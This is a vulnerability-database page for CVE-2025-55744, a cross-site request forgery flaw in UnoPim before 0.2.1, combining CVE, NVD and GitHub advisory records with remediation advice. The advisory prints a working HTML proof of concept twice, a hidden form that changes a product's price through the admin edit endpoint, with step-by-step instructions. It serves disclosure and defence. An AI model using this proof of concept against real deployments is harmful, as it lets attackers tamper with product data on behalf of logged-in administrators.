cvelistv5 - cve-2025-55744

CVE-2025-55744 (GCVE-0-2025-55744)

Vulnerability from cvelistv5 – Published: 2025-08-21 15:51 – Updated: 2025-08-21 20:00

Summary

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). This vulnerability is fixed in 0.2.1.

Severity ?

6.9 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

CWE

CWE-352 - Cross-Site Request Forgery (CSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/unopim/unopim/security/advisor…	x_refsource_CONFIRM
	https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	unopim	unopim	Affected: < 0.2.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55744",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-21T20:00:44.915447Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-21T20:00:56.409Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "unopim",
          "vendor": "unopim",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.2.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). This vulnerability is fixed in 0.2.1."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-352",
              "description": "CWE-352: Cross-Site Request Forgery (CSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-21T15:51:43.126Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw"
        },
        {
          "name": "https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ"
        }
      ],
      "source": {
        "advisory": "GHSA-287x-6r2h-f9mw",
        "discovery": "UNKNOWN"
      },
      "title": "UnoPim vulnerable to CSRF on Product edit feature and creation of other types"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55744",
    "datePublished": "2025-08-21T15:51:43.126Z",
    "dateReserved": "2025-08-14T22:31:17.685Z",
    "dateUpdated": "2025-08-21T20:00:56.409Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55744\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-21T16:15:34.640\",\"lastModified\":\"2025-08-22T21:52:35.503\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). This vulnerability is fixed in 0.2.1.\"},{\"lang\":\"es\",\"value\":\"UnoPim es un sistema de gesti\u00f3n de informaci\u00f3n de productos (PIM) de c\u00f3digo abierto basado en el framework Laravel. En versiones anteriores a la 0.2.1, algunos endpoints de la aplicaci\u00f3n eran vulnerables a Cross site Request forgery (CSRF). Esta vulnerabilidad se corrigi\u00f3 en la 0.2.1.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N\",\"baseScore\":4.3,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":1.4}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-352\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webkul:unopim:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"0.2.1\",\"matchCriteriaId\":\"1EFD0FCC-3460-4CCD-ACBD-6541CF5CD81C\"}]}]}],\"references\":[{\"url\":\"https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\"]},{\"url\":\"https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55744\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-21T20:00:44.915447Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-21T20:00:51.957Z\"}}], \"cna\": {\"title\": \"UnoPim vulnerable to CSRF on Product edit feature and creation of other types\", \"source\": {\"advisory\": \"GHSA-287x-6r2h-f9mw\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 6.9, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"unopim\", \"product\": \"unopim\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.2.1\"}]}], \"references\": [{\"url\": \"https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw\", \"name\": \"https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ\", \"name\": \"https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). This vulnerability is fixed in 0.2.1.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-352\", \"description\": \"CWE-352: Cross-Site Request Forgery (CSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-21T15:51:43.126Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55744\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-21T20:00:56.409Z\", \"dateReserved\": \"2025-08-14T22:31:17.685Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-21T15:51:43.126Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GHSA-287X-6R2H-F9MW

Vulnerability from github – Published: 2025-08-21 14:27 – Updated: 2025-08-21 19:16

Summary

UnoPim vulnerable to CSRF on Product edit feature and creation of other types

Details

Summary

Some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). | Method | Endpoint | Status | Reason | |:------:|:------:|:------:|:------:| | POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used | | GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing X-XSRF-TOKEN header or similar protection | | POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | X-XSRF-TOKEN header used |

The below are some of the vulnerable endpoints that allow state changing actions including but not limited to:

/admin/catalog/categories/create
/admin/catalog/categories/edit/{id}
/admin/catalog/category-fields/create
/admin/catalog/category-fields/edit/{id}
/admin/catalog/attributes/create
/admin/catalog/attributes/edit/{id}

Details

CSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim. In this case, the POST request doesn't need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either application/x-www-form-urlencoded or multipart/form-data so we can say this is a Simple request ( doesn't need preflight request ). The cookies are send because samesite is set to None. We have every ingredients for a successful CSRF attack.

PoC

1. Go to any product and click on Edit.
2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )
3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.

POC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ

csrf-poc.html:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8000/admin/catalog/products/edit/7" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="&#95;token" value="s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5" />
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="sku" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="channel" value="default" />
      <input type="hidden" name="locale" value="en&#95;US" />
      <input type="hidden" name="values&#91;common&#93;&#91;sku&#93;" value="SM&#45;BL&#45;102" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;sku&#93;" value="values&#91;common&#93;&#91;sku&#93;" />
      <input type="hidden" name="values&#91;common&#93;&#91;product&#95;number&#93;" value="" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;product&#95;number&#93;" value="values&#91;common&#93;&#91;product&#95;number&#93;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;name&#93;" value="test" />
      <input type="hidden" name="values&#91;common&#93;&#91;url&#95;key&#93;" value="fffkk" />
      <input type="hidden" name="uniqueFields&#91;values&#46;common&#46;url&#95;key&#93;" value="values&#91;common&#93;&#91;url&#95;key&#93;" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;tax&#95;category&#95;id&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;color&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;size&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;brand&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;short&#95;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;description&#93;" value="&lt;p&gt;fff&lt;&#47;p&gt;" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;title&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;keywords&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;meta&#95;description&#93;" value="" />
      <input type="hidden" name="values&#91;channel&#95;locale&#95;specific&#93;&#91;default&#93;&#91;en&#95;US&#93;&#91;price&#93;&#91;USD&#93;" value="7&#46;777" />
      <input type="hidden" name="values&#91;channel&#95;specific&#93;&#91;default&#93;&#91;cost&#93;&#91;USD&#93;" value="" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="false" />
      <input type="hidden" name="values&#91;common&#93;&#91;status&#93;" value="true" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

Attacker can perform action on behalf of the victim as this happens on the victim's browser provide the victim is already authenticated to the application. Attacker can use an image tag to send the GET request such that when the page is loaded, it'll get executed. As shown in the video POC, the product information can be tampered, create new categories etc.

Remediation:

Use CSRF token for every state changing request.
Use samesite: lax or strict, now it is set 'None'. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.

Severity ?

6.9 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.2.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "unopim/unopim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55744"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-352"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:27:18Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nSome of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF).\n| Method | Endpoint | Status   | Reason |\n|:------:|:------:|:------:|:------:|\n| POST | /admin/catalog/products/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used |\n| GET | /admin/catalog/products/copy/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection |\n| POST | /admin/catalog/products/edit/{id}| Vulnerable :x: | Missing `X-XSRF-TOKEN` header or similar protection |\n| POST | /admin/settings/users/create | Not Vulnerable :white_check_mark: | `X-XSRF-TOKEN` header used |\n\nThe below are some of the vulnerable endpoints that allow state changing actions including but not limited to:\n```\n/admin/catalog/categories/create\n/admin/catalog/categories/edit/{id}\n/admin/catalog/category-fields/create\n/admin/catalog/category-fields/edit/{id}\n/admin/catalog/attributes/create\n/admin/catalog/attributes/edit/{id}\n```\n\n### Details\nCSRF attack happens when you visit an attacker controlled website which sends a cross origin request to vulnerable application in order to perform a state changing operation like edit the price of a product without the intention of victim.\nIn this case, the POST request doesn\u0027t need any special headers ( X-XSRF-TOKEN header missing ) and the content-type is either `application/x-www-form-urlencoded` or `multipart/form-data` so we can say this is a `Simple request` ( doesn\u0027t need preflight request ).  The cookies are send because `samesite` is set to `None`. We have every ingredients for a successful CSRF attack.\n\n### PoC\n    1. Go to any product and click on Edit.\n    2. Capture the request on Burp, right click and generate a CSRF POC  ( or use the below csrf-poc.html )\n    3. Access the poc.html and press submit request, the cross origin request will be send and we can see the price of the product has been changed.\n\nPOC Video link: https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ\n\n`csrf-poc.html`:\n```\n\u003chtml\u003e\n  \u003c!-- CSRF PoC - generated by Burp Suite Professional --\u003e\n  \u003cbody\u003e\n  \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n    \u003cform action=\"http://127.0.0.1:8000/admin/catalog/products/edit/7\" method=\"POST\" enctype=\"multipart/form-data\"\u003e\n      \u003cinput type=\"hidden\" name=\"\u0026#95;token\" value=\"s9Egihm0RD1Pd1NxhvTrx0a4qKCdl0UTSzyyJaK5\" /\u003e\n      \u003cinput type=\"hidden\" name=\"\u0026#95;method\" value=\"PUT\" /\u003e\n      \u003cinput type=\"hidden\" name=\"sku\" value=\"SM\u0026#45;BL\u0026#45;102\" /\u003e\n      \u003cinput type=\"hidden\" name=\"channel\" value=\"default\" /\u003e\n      \u003cinput type=\"hidden\" name=\"locale\" value=\"en\u0026#95;US\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;sku\u0026#93;\" value=\"SM\u0026#45;BL\u0026#45;102\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;sku\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;sku\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;product\u0026#95;number\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;product\u0026#95;number\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;product\u0026#95;number\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;name\u0026#93;\" value=\"test\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;url\u0026#95;key\u0026#93;\" value=\"fffkk\" /\u003e\n      \u003cinput type=\"hidden\" name=\"uniqueFields\u0026#91;values\u0026#46;common\u0026#46;url\u0026#95;key\u0026#93;\" value=\"values\u0026#91;common\u0026#93;\u0026#91;url\u0026#95;key\u0026#93;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;tax\u0026#95;category\u0026#95;id\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;tax\u0026#95;category\u0026#95;id\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;color\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;color\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;size\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;size\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;brand\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;brand\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;short\u0026#95;description\u0026#93;\" value=\"\u0026lt;p\u0026gt;fff\u0026lt;\u0026#47;p\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;description\u0026#93;\" value=\"\u0026lt;p\u0026gt;fff\u0026lt;\u0026#47;p\u0026gt;\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;title\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;keywords\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;meta\u0026#95;description\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;locale\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;en\u0026#95;US\u0026#93;\u0026#91;price\u0026#93;\u0026#91;USD\u0026#93;\" value=\"7\u0026#46;777\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;channel\u0026#95;specific\u0026#93;\u0026#91;default\u0026#93;\u0026#91;cost\u0026#93;\u0026#91;USD\u0026#93;\" value=\"\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;status\u0026#93;\" value=\"false\" /\u003e\n      \u003cinput type=\"hidden\" name=\"values\u0026#91;common\u0026#93;\u0026#91;status\u0026#93;\" value=\"true\" /\u003e\n      \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n    \u003c/form\u003e\n  \u003c/body\u003e\n\u003c/html\u003e\n\n```\n\n### Impact\nAttacker can perform action on behalf of the victim as this happens on the victim\u0027s browser provide the victim is already authenticated to the application.\nAttacker can use an image tag to send the GET request such that when the page is loaded, it\u0027ll get executed.\nAs shown in the video POC, the product information can be tampered, create new categories etc.\n\n### Remediation:\n- Use CSRF token for every state changing request.\n- Use samesite: lax or strict, now it is set \u0027None\u0027. Make sure all state changing requests are done using POST instead of GET. Noticed that for product copy feature, GET is used which means Samesite:strict needs to be set in that case. Otherwise Samesite: lax should suffice.",
  "id": "GHSA-287x-6r2h-f9mw",
  "modified": "2025-08-21T19:16:50Z",
  "published": "2025-08-21T14:27:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55744"
    },
    {
      "type": "WEB",
      "url": "https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unopim/unopim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "UnoPim vulnerable to CSRF on Product edit feature and creation of other types"
}

FKIE_CVE-2025-55744

Vulnerability from fkie_nvd - Published: 2025-08-21 16:15 - Updated: 2025-08-22 21:52

Severity ?

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://drive.proton.me/urls/VXNDKQ4WKR#LpvE777hl8OJ	Exploit
	security-advisories@github.com	https://github.com/unopim/unopim/security/advisories/GHSA-287x-6r2h-f9mw	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	webkul	unopim	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:webkul:unopim:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1EFD0FCC-3460-4CCD-ACBD-6541CF5CD81C",
              "versionEndExcluding": "0.2.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Before 0.2.1, some of the endpoints of the application is vulnerable to Cross site Request forgery (CSRF). This vulnerability is fixed in 0.2.1."
    },
    {
      "lang": "es",
      "value": "UnoPim es un sistema de gesti\u00f3n de informaci\u00f3n de productos (PIM) de c\u00f3digo abierto basado en el framework Laravel. En versiones anteriores a la 0.2.1, algunos endpoints de la aplicaci\u00f3n eran vulnerables a Cross site Request forgery (CSRF). Esta vulnerabilidad se corrigi\u00f3 en la 0.2.1."
    }
  ],
  "id": "CVE-2025-55744",
  "lastModified": "2025-08-22T21:52:35.503",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 1.4,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
